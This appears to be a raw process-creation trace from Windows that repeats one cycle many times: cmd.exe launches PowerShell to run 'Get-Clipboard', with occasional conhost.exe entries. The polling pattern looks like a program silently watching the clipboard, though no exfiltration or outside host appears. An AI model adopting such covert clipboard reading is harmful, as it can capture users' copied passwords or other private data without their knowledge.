powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
